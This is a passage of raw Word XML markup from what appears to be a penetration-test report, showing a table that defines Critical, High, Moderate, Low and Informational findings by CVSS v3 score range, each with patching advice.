            <w:tcW w:w="1620" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="0EDFB2F7" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="258" w:lineRule="exact"/>
              <w:ind w:left="124" w:right="106"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>V3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E17297" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="258" w:lineRule="exact"/>
              <w:ind w:left="126" w:right="106"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="01F5E1ED" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="137"/>
              <w:ind w:left="2787" w:right="2767"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007742E2" w14:paraId="594D2622" w14:textId="77777777" w:rsidTr="009C36F8">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="145D38AF" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="10"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="27"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57544294" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="127"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="568AF9A9" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C98B6B1" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="102"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9.0-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79A56629" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="114" w:right="93"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>straightforward</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-7"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>usually</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>results</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">system-level compromise. It is advised to form a plan of action and patch </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007742E2" w14:paraId="003DA143" w14:textId="77777777" w:rsidTr="009C36F8">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="7FBCCE46" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0942512A" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="130"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="503063F1" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B76EA6B" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="101"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>7.0-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C0BEADB" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="113" w:right="399"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Exploitation is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>more</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>difficult but could</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>cause</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>elevated</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>privileges</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>and potentially a loss of data or downtime. It is advised to form a plan of action and patch as soon as possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007742E2" w14:paraId="42D4651E" w14:textId="77777777" w:rsidTr="009C36F8">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="576048AD" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="10"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="27"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23D0FDAD" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="128"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23A09C22" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6392865D" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="101"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>4.0-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0739789A" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="115" w:right="261"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>exist</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>but</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>are</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>exploitable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>require</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>extra</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>steps</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>such as social engineering. It is advised to form a plan of action and patch after high-priority issues have been resolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007742E2" w14:paraId="6D5D2587" w14:textId="77777777" w:rsidTr="009C36F8">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00AE50"/>
          </w:tcPr>
          <w:p w14:paraId="6937FA13" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2381A45D" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="129"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F8B481F" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D5A99E9" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="101"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>0.1-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77CF78E0" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="113" w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Vulnerabilities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>are</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>non-exploitable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>but</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>would</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>reduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>an</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>organization’s attack surface. It is advised to form a plan of action and patch during the next maintenance window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007742E2" w14:paraId="6E3EE9A2" w14:textId="77777777" w:rsidTr="009C36F8">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="006EC0"/>
          </w:tcPr>
          <w:p w14:paraId="2975AB7F" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2240FFEE" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="130"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A70A4E" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D4318B1" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="102"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22172DA5" w14:textId="77777777" w:rsidR="007742E2" w:rsidRDefault="007742E2" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="114" w:right="93"/>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>vulnerability</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>exists.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="36"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Additional</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>provided</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">regarding items noticed during testing, strong controls, and additional </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
